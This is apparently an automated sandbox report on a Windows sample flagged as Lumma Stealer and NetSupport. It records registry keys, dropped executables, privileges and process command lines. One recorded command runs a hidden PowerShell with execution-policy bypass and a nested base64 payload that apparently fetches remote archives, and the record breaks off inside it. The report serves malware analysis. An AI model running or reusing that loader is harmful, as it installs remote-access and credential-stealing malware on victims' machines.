Analysis Overview
SHA256
f659219bbbb50593d0cd629ccf48faca878b444162b14863854480a7c9289266
Threat Level: Known bad
The file f659219bbbb50593d0cd629ccf48faca878b444162b14863854480a7c9289266.exe was found to be: Known bad.
Malicious Activity Summary
Lumma Stealer, LummaC
NetSupport
Command and Scripting Interpreter: PowerShell
Loads dropped DLL
Executes dropped EXE
Adds Run key to start application
Legitimate hosting services abused for malware hosting/C2
Suspicious use of SetThreadContext
System Location Discovery: System Language Discovery
Program crash
Unsigned PE
Enumerates physical storage devices
Suspicious behavior: MapViewOfSection
Suspicious use of AdjustPrivilegeToken
Modifies Internet Explorer settings
Modifies registry class
Checks processor information in registry
Suspicious use of FindShellTrayWindow
Suspicious use of WriteProcessMemory
Suspicious use of SetWindowsHookEx
Suspicious behavior: GetForegroundWindowSpam
Suspicious behavior: EnumeratesProcesses
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-10-07 02:12
Signatures
Unsigned PE
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Analysis: behavioral21
Detonation Overview
Submitted
2024-10-07 02:11
Reported
2024-10-07 02:15
Platform
win7-20240708-en
Max time kernel
120s
Max time network
123s
Command Line
Signatures
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\rundll32.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 2120 wrote to memory of 2180 | N/A | C:\Windows\system32\rundll32.exe | C:\Windows\SysWOW64\rundll32.exe |
| PID 2120 wrote to memory of 2180 | N/A | C:\Windows\system32\rundll32.exe | C:\Windows\SysWOW64\rundll32.exe |
| PID 2120 wrote to memory of 2180 | N/A | C:\Windows\system32\rundll32.exe | C:\Windows\SysWOW64\rundll32.exe |
| PID 2120 wrote to memory of 2180 | N/A | C:\Windows\system32\rundll32.exe | C:\Windows\SysWOW64\rundll32.exe |
| PID 2120 wrote to memory of 2180 | N/A | C:\Windows\system32\rundll32.exe | C:\Windows\SysWOW64\rundll32.exe |
| PID 2120 wrote to memory of 2180 | N/A | C:\Windows\system32\rundll32.exe | C:\Windows\SysWOW64\rundll32.exe |
| PID 2120 wrote to memory of 2180 | N/A | C:\Windows\system32\rundll32.exe | C:\Windows\SysWOW64\rundll32.exe |
Processes
C:\Windows\system32\rundll32.exe
rundll32.exe C:\Users\Admin\AppData\Local\Temp\jre\bin\awt.dll,#1
C:\Windows\SysWOW64\rundll32.exe
rundll32.exe C:\Users\Admin\AppData\Local\Temp\jre\bin\awt.dll,#1
Network
Files
Analysis: behavioral32
Detonation Overview
Submitted
2024-10-07 02:11
Reported
2024-10-07 02:15
Platform
win10v2004-20240802-en
Max time kernel
126s
Max time network
160s
Command Line
Signatures
Program crash
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Windows\SysWOW64\rundll32.exe |
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\rundll32.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 3560 wrote to memory of 1756 | N/A | C:\Windows\system32\rundll32.exe | C:\Windows\SysWOW64\rundll32.exe |
| PID 3560 wrote to memory of 1756 | N/A | C:\Windows\system32\rundll32.exe | C:\Windows\SysWOW64\rundll32.exe |
| PID 3560 wrote to memory of 1756 | N/A | C:\Windows\system32\rundll32.exe | C:\Windows\SysWOW64\rundll32.exe |
Processes
C:\Windows\system32\rundll32.exe
rundll32.exe C:\Users\Admin\AppData\Local\Temp\jre\bin\deploy.dll,#1
C:\Windows\SysWOW64\rundll32.exe
rundll32.exe C:\Users\Admin\AppData\Local\Temp\jre\bin\deploy.dll,#1
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 368 -p 1756 -ip 1756
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1756 -s 664
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --field-trial-handle=4500,i,4174666705242427184,7333705955694532165,262144 --variations-seed-version --mojo-platform-channel-handle=4512 /prefetch:8
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 149.220.183.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.211.185.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 197.87.175.4.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 15.164.165.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 31.243.111.52.in-addr.arpa | udp |
Files
Analysis: behavioral2
Detonation Overview
Submitted
2024-10-07 02:11
Reported
2024-10-07 02:14
Platform
win10v2004-20240802-en
Max time kernel
122s
Max time network
148s
Command Line
Signatures
NetSupport
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\InstallerPDW\install.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\InstallerPDW\jre\bin\javaw.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\fe4cb4db9fe2a79024e9e07150b10e2f\vlc.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\LoadbrowserBf_alpha\vlc.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\TempControll\client32.exe | N/A |
Loads dropped DLL
Adds Run key to start application
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1194130065-3471212556-1656947724-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\TempControll = "C:\\Users\\Admin\\AppData\\Roaming\\TempControll\\client32.exe" | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Legitimate hosting services abused for malware hosting/C2
| Description | Indicator | Process | Target |
| N/A | pastebin.com | N/A | N/A |
| N/A | pastebin.com | N/A | N/A |
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 3320 set thread context of 3112 | N/A | C:\Users\Admin\AppData\Roaming\LoadbrowserBf_alpha\vlc.exe | C:\Windows\SysWOW64\cmd.exe |
Enumerates physical storage devices
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\wbem\WMIC.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\more.com | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\chcp.com | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\f659219bbbb50593d0cd629ccf48faca878b444162b14863854480a7c9289266.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Roaming\InstallerPDW\install.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\chcp.com | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\chcp.com | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Roaming\InstallerPDW\jre\bin\javaw.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\explorer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\chcp.com | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\wbem\WMIC.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\more.com | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\chcp.com | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\more.com | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Roaming\TempControll\client32.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\explorer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\wbem\WMIC.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe | N/A |
Checks processor information in registry
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe | N/A |
Modifies Internet Explorer settings
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-1194130065-3471212556-1656947724-1000\SOFTWARE\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BROWSER_EMULATION | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-1194130065-3471212556-1656947724-1000_Classes\Local Settings | C:\Windows\explorer.exe | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious behavior: MapViewOfSection
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\LoadbrowserBf_alpha\vlc.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\cmd.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\SysWOW64\wbem\WMIC.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\SysWOW64\wbem\WMIC.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\SysWOW64\wbem\WMIC.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\SysWOW64\wbem\WMIC.exe | N/A |
| Token: SeSystemProfilePrivilege | N/A | C:\Windows\SysWOW64\wbem\WMIC.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\SysWOW64\wbem\WMIC.exe | N/A |
| Token: SeProfSingleProcessPrivilege | N/A | C:\Windows\SysWOW64\wbem\WMIC.exe | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\SysWOW64\wbem\WMIC.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\SysWOW64\wbem\WMIC.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\SysWOW64\wbem\WMIC.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\SysWOW64\wbem\WMIC.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\SysWOW64\wbem\WMIC.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\wbem\WMIC.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\SysWOW64\wbem\WMIC.exe | N/A |
| Token: SeRemoteShutdownPrivilege | N/A | C:\Windows\SysWOW64\wbem\WMIC.exe | N/A |
| Token: SeUndockPrivilege | N/A | C:\Windows\SysWOW64\wbem\WMIC.exe | N/A |
| Token: SeManageVolumePrivilege | N/A | C:\Windows\SysWOW64\wbem\WMIC.exe | N/A |
| Token: 33 | N/A | C:\Windows\SysWOW64\wbem\WMIC.exe | N/A |
| Token: 34 | N/A | C:\Windows\SysWOW64\wbem\WMIC.exe | N/A |
| Token: 35 | N/A | C:\Windows\SysWOW64\wbem\WMIC.exe | N/A |
| Token: 36 | N/A | C:\Windows\SysWOW64\wbem\WMIC.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\SysWOW64\wbem\WMIC.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\SysWOW64\wbem\WMIC.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\SysWOW64\wbem\WMIC.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\SysWOW64\wbem\WMIC.exe | N/A |
| Token: SeSystemProfilePrivilege | N/A | C:\Windows\SysWOW64\wbem\WMIC.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\SysWOW64\wbem\WMIC.exe | N/A |
| Token: SeProfSingleProcessPrivilege | N/A | C:\Windows\SysWOW64\wbem\WMIC.exe | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\SysWOW64\wbem\WMIC.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\SysWOW64\wbem\WMIC.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\SysWOW64\wbem\WMIC.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\SysWOW64\wbem\WMIC.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\SysWOW64\wbem\WMIC.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\wbem\WMIC.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\SysWOW64\wbem\WMIC.exe | N/A |
| Token: SeRemoteShutdownPrivilege | N/A | C:\Windows\SysWOW64\wbem\WMIC.exe | N/A |
| Token: SeUndockPrivilege | N/A | C:\Windows\SysWOW64\wbem\WMIC.exe | N/A |
| Token: SeManageVolumePrivilege | N/A | C:\Windows\SysWOW64\wbem\WMIC.exe | N/A |
| Token: 33 | N/A | C:\Windows\SysWOW64\wbem\WMIC.exe | N/A |
| Token: 34 | N/A | C:\Windows\SysWOW64\wbem\WMIC.exe | N/A |
| Token: 35 | N/A | C:\Windows\SysWOW64\wbem\WMIC.exe | N/A |
| Token: 36 | N/A | C:\Windows\SysWOW64\wbem\WMIC.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\SysWOW64\wbem\WMIC.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\SysWOW64\wbem\WMIC.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\SysWOW64\wbem\WMIC.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\SysWOW64\wbem\WMIC.exe | N/A |
| Token: SeSystemProfilePrivilege | N/A | C:\Windows\SysWOW64\wbem\WMIC.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\SysWOW64\wbem\WMIC.exe | N/A |
| Token: SeProfSingleProcessPrivilege | N/A | C:\Windows\SysWOW64\wbem\WMIC.exe | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\SysWOW64\wbem\WMIC.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\SysWOW64\wbem\WMIC.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\SysWOW64\wbem\WMIC.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\SysWOW64\wbem\WMIC.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\SysWOW64\wbem\WMIC.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\wbem\WMIC.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\SysWOW64\wbem\WMIC.exe | N/A |
| Token: SeRemoteShutdownPrivilege | N/A | C:\Windows\SysWOW64\wbem\WMIC.exe | N/A |
| Token: SeUndockPrivilege | N/A | C:\Windows\SysWOW64\wbem\WMIC.exe | N/A |
| Token: SeManageVolumePrivilege | N/A | C:\Windows\SysWOW64\wbem\WMIC.exe | N/A |
| Token: 33 | N/A | C:\Windows\SysWOW64\wbem\WMIC.exe | N/A |
| Token: 34 | N/A | C:\Windows\SysWOW64\wbem\WMIC.exe | N/A |
| Token: 35 | N/A | C:\Windows\SysWOW64\wbem\WMIC.exe | N/A |
| Token: 36 | N/A | C:\Windows\SysWOW64\wbem\WMIC.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\SysWOW64\wbem\WMIC.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\TempControll\client32.exe | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\InstallerPDW\jre\bin\javaw.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\InstallerPDW\jre\bin\javaw.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\f659219bbbb50593d0cd629ccf48faca878b444162b14863854480a7c9289266.exe
"C:\Users\Admin\AppData\Local\Temp\f659219bbbb50593d0cd629ccf48faca878b444162b14863854480a7c9289266.exe"
C:\Users\Admin\AppData\Roaming\InstallerPDW\install.exe
C:\Users\Admin\AppData\Roaming\InstallerPDW\install.exe
C:\Users\Admin\AppData\Roaming\InstallerPDW\jre\bin\javaw.exe
"C:\Users\Admin\AppData\Roaming\InstallerPDW\jre\bin\javaw.exe" -Dfile.encoding=UTF-8 -classpath "jre\.;jre\..;jre\asm-all.jar;jre\bin;jre\COPYRIGHT;jre\dn-compiled-module.jar;jre\dn-php-sdk.jar;jre\gson.jar;jre\jphp-app-framework.jar;jre\jphp-core.jar;jre\jphp-desktop-ext.jar;jre\jphp-gui-ext.jar;jre\jphp-json-ext.jar;jre\jphp-runtime.jar;jre\jphp-xml-ext.jar;jre\jphp-zend-ext.jar;jre\jphp-zip-ext.jar;jre\lib;jre\LICENSE;jre\README.txt;jre\release;jre\slf4j-api.jar;jre\slf4j-simple.jar;jre\THIRDPARTYLICENSEREADME-JAVAFX.txt;jre\THIRDPARTYLICENSEREADME.txt;jre\Welcome.html;jre\zt-zip.jar" org.develnext.jphp.ext.javafx.FXLauncher
C:\Windows\SysWOW64\cmd.exe
C:\Windows\System32\cmd.exe /c "C:\Windows\System32\chcp.com 65001>nul & C:\Windows\SysNative\reg.exe query "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion" /v "CurrentBuild""
C:\Windows\SysWOW64\chcp.com
C:\Windows\System32\chcp.com 65001
C:\Windows\system32\reg.exe
C:\Windows\SysNative\reg.exe query "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion" /v "CurrentBuild"
C:\Windows\SysWOW64\cmd.exe
C:\Windows\System32\cmd.exe /c "C:\Windows\System32\chcp.com 866>nul & C:\Windows\System32\wbem\wmic.exe CPU get Name /Format:List | C:\Windows\System32\more.com"
C:\Windows\SysWOW64\chcp.com
C:\Windows\System32\chcp.com 866
C:\Windows\SysWOW64\wbem\WMIC.exe
C:\Windows\System32\wbem\wmic.exe CPU get Name /Format:List
C:\Windows\SysWOW64\more.com
C:\Windows\System32\more.com
C:\Windows\SysWOW64\cmd.exe
C:\Windows\System32\cmd.exe /c "C:\Windows\System32\chcp.com 866>nul & C:\Windows\System32\wbem\wmic.exe Path Win32_VideoController Get AdapterCompatibility /Format:List | C:\Windows\System32\more.com"
C:\Windows\SysWOW64\chcp.com
C:\Windows\System32\chcp.com 866
C:\Windows\SysWOW64\wbem\WMIC.exe
C:\Windows\System32\wbem\wmic.exe Path Win32_VideoController Get AdapterCompatibility /Format:List
C:\Windows\SysWOW64\more.com
C:\Windows\System32\more.com
C:\Windows\SysWOW64\cmd.exe
C:\Windows\System32\cmd.exe /c "C:\Windows\System32\chcp.com 866>nul & C:\Windows\System32\wbem\wmic.exe path Win32_ComputerSystem get TotalPhysicalMemory /Format:List | C:\Windows\System32\more.com"
C:\Windows\SysWOW64\chcp.com
C:\Windows\System32\chcp.com 866
C:\Windows\SysWOW64\wbem\WMIC.exe
C:\Windows\System32\wbem\wmic.exe path Win32_ComputerSystem get TotalPhysicalMemory /Format:List
C:\Windows\SysWOW64\more.com
C:\Windows\System32\more.com
C:\Windows\SysWOW64\cmd.exe
C:\Windows\System32\cmd.exe /c "C:\Windows\System32\chcp.com 65001>nul & C:\Windows\SysNative\reg.exe query "HKU\S-1-5-19""
C:\Windows\SysWOW64\chcp.com
C:\Windows\System32\chcp.com 65001
C:\Windows\system32\reg.exe
C:\Windows\SysNative\reg.exe query "HKU\S-1-5-19"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy Bypass -NoProfile -WindowStyle Hidden -Command "& {$script = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('cG93RXJTSGVMTCAtbm9wUm8gLUV4ZWNVVElvTnBPIEJZcGFTUyAtdyBISWQgLWVjIEpBQnBBR1VBVVFCeUFHUUFPUUJrQUVNQVBRQW5BR2dBZEFCMEFIQUFjd0E2QUM4QUx3Qm5BR0VBYVFCc0FITUFZUUJqQUdFQVpBQmxBRzBBZVFBdUFHTUFid0J0QUM4QVpnQjZBR0VBTHdCbUFERUFZUUF1QUhvQWFRQndBQ2NBT3dBZ0FDUUFTQUJrQUVFQVZnQjVBSEVBU0FBOUFFY0FZd0JOQUNBQVpRQjRBSEFBUVFCT0FHUUFMUUJCQUhJQVF3QklBRWtBVmdCbEFDQUFMUUJGQUhJQWNnQlBBSElBUVFCakFGUUFhUUJQQUc0QUlBQnpBRWtBVEFCbEFFNEFWQUJzQUZrQVF3QlBBRzRBVkFCSkFFNEFWUUJsQURzQUlBQWtBSFVBYXdCWUFGZ0FVZ0JHQUVrQVpRQTlBQ2NBYlFBekFESUFWd0JXQURVQVlnQlNBQzRBZWdCcEFIQUFKd0E3QUNBQUpBQlNBSElBVGdCb0FFZ0FTUUJsQUQwQUp3Qm9BSFFBZEFCd0FITUFPZ0F2QUM4QVp3QmhBR2tBYkFCekFHRUFZd0JoQUdRQVpRQnRBSGtBTGdCakFHOEFiUUF2QUdZQWVnQmhBQzhBWmdBMEFHRUFMZ0I2QUdrQWNBQW5BRHNBSUFBa0FITUFWUUJDQUhBQVlnQm1BRGdBUFFBbkFFd0FUd0F4QUdrQWJnQk9BRUVBTGdCNkFHa0FjQUFuQURzQUlBQWtBRzRBUlFBMEFFRUFUZ0JNQUdZQVBRQkhBR01BVFFBZ0FGTUFWQUJoQUhJQVZBQXRBR0lBYVFCVUFITUFkQUJTQUdFQWJnQnpBR1lBWlFCeUFDQUFMUUJsQUhJQWNnQlBBRklBWVFCakFGUUFTUUJ2QUU0QUlBQlRBR2tBYkFCbEFFNEFWQUJNQUhrQVl3QnZBRTRBVkFCSkFHNEFkUUJGQURzQUlBQWtBR0lBYkFCaUFHVUFjQUI2QUZvQVBRQW5BRFlBUkFCTkFFd0FWUUF1QUhvQWFRQndBQ2NBT3dBZ0FDUUFVZ0JuQUhvQU5RQlhBRXdBYmdBOUFDY0FhQUIwQUhRQWNBQnpBRG9BTHdBdkFHY0FZUUJwQUd3QWN3QmhBR01BWVFCa0FHVUFiUUI1QUM0QVl3QnZBRzBBTHdCbUFIb0FZUUF2QUdZQU13QmhBQzRBZWdCcEFIQUFKd0E3QUNBQVd3QnVBR1VBZEFBdUFITUFSUUJ5QUhZQWFRQkRBRVVBVUFCUEFFa0FUZ0IwQUcwQVFRQk9BRUVBUndCRkFGSUFYUUE2QURvQWN3QmxBRU1BZFFCU0FFa0FWQUJaQUhBQVVnQlBBRlFBYndCakFFOEFiQUFnQUQwQUlBQmJBRTRBWlFCMEFDNEFjd0JGQUdNQVZRQlNBRWtBVkFCWkFGQUFVZ0JQQUhRQVR3QmpBRThBVEFCMEFGa0FjQUJsQUYwQU9nQTZBRlFBVEFCVEFERUFNZ0E3QUNBQUpBQkpBRzRBUXdCSEFESUFNZ0JXQUVvQVBRQW5BRlFBWlFCdEFIQUFRd0J2QUc0QWRBQnlBRzhBYkFCc0FDY0FPd0FnQUNRQU5BQjVBRVlBWXdCS0FGWUFTZ0E5QUNjQWJBQTRBR1VBUmdCV0FFOEFVd0JUQUM0QWVnQnBBSEFBSndBN0FDQUFZd0JFQUNBQUpBQkZBRzRBZGdBNkFFRUFjQUJ3QUdRQVlRQjBBR0VBT3dBZ0FDUUFSQUF6QUdjQWJBQndBRDBBSndCb0FIUUFkQUJ3QUhNQU9nQXZBQzhBWndCaEFHa0FiQUJ6QUdFQVl3QmhBR1FBWlFCdEFIa0FMZ0JqQUc4QWJRQXZBR1lBZWdCaEFDOEFaZ0F5QUdFQUxnQjZBR2tBY0FBbkFEc0FJQUFrQUVZQVl3QnRBRllBVndCekFGa0FQUUFpQUNRQVpRQk9BSFlBT2dCaEFGQUFVQUJrQUVFQWRBQkJBRndBSkFCaUFHd0FZZ0JsQUhBQWVnQmFBQ0lBT3dBZ0FDUUFlQUJJQUdZQU5RQjRBRzhBVFFCMUFEMEFJZ0FrQUdVQVRnQjJBRG9BUVFCd0FIQUFSQUJoQUhRQVFRQmNBQ1FBY3dCVkFFSUFjQUJpQUdZQU9BQWlBRHNBSUFBa0FFNEFjd0JLQUhnQWRRQlpBRGdBVkFBOUFDSUFld0F3QUgwQVhBQjdBREVBZlFBaUFDQUFM